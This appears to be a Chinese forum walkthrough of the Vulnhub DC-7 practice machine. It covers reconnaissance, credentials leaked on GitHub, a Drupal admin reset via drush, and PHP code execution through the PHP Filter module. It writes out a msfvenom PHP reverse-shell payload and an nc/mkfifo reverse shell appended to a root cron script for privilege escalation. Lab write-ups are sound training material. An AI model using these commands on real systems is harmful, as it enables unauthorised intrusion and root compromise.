Vunlnhub靶机DC-7
注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。
DC-7 靶机实战(DC-)
DC-7 靶机
信息收集
1 | nmap - A - sV - O - p - - T4 10.10 . 10.224
|
访问80端口
它告诉我们如果进行暴力破解可能不会成功,在盒子外面,那么我们可以尝试进行社工
git源码泄露
在访问80端口可以看到@DC7USER这个商标,我们不妨去github上面看看
果然,我们拿到了用户名和密码
使用ssh登录账号
1 2 3 | ssh dc7user$ 10.10 . 10.224
dc7user / MdR3xOgB7
|
ls查看有个mbox邮箱,打开一直在调用/opt/scripts/backups.sh,这是一个定时任务
这个文件只能由root和www-data才能修改
修改网站admin密码
1 | Drush是Drupal的命令行shell和Unix脚本接口。Drush Core附带了许多有用的命令,可用于与模块 / 主题 / 配置文件等代码进行交互。
|
Drush命令可以修改网站后台admin用户的密码,命令:drush user-password admin --password="123"。
注意使用drush命令的时候要先切换到项目根目录,网站源码所在目录,网站目录一般在/var/www/html
先进入网站根目录下
修改admin密码
1 | drush user - password admin - - password = "123"
|
登录admin用户
可以看到我们进入到了这个用户,我们可以下载一些漏洞插件,然后利用插件
下载PHP Filter模块
1 | https: / / www.drupal.org / project / php
|
下载完成后将插件勾选并安装
点击preview,成功看到phpinfo
然后就可以进入content,选择basic page,选择php code测试下。输入完后点击preview,成功看到phpinfo。
生成木马
那么我们可以生成一个php的反弹shell写进去
1 | msfvenom - p php / meterpreter / reverse_tcp LHOST = 10.10 . 10.128 LPORT = 4444 - f raw
|
将生成的木马拷贝到PHP网页代码中
进入msf
msf这边侦听,网页端点击preview
然后我们就拿到了shell
提权
获取一个交互的shell
1 | python - c 'import pty;pty.spawn("/bin/bash")'
|
在d7user用户发现的backups.sh文件在这里就能够执行了
根据之前的mail提示进入到/opt/scripts目录下
backups.sh文件写入反弹shell代码:
1 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.128 4444 >/tmp/f" >> backups.sh
|
kali监听:
耐心等待大约十分钟,就获得了shell
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!
最后于 2021-3-7 10:44
被安全小蜘蛛编辑
,原因: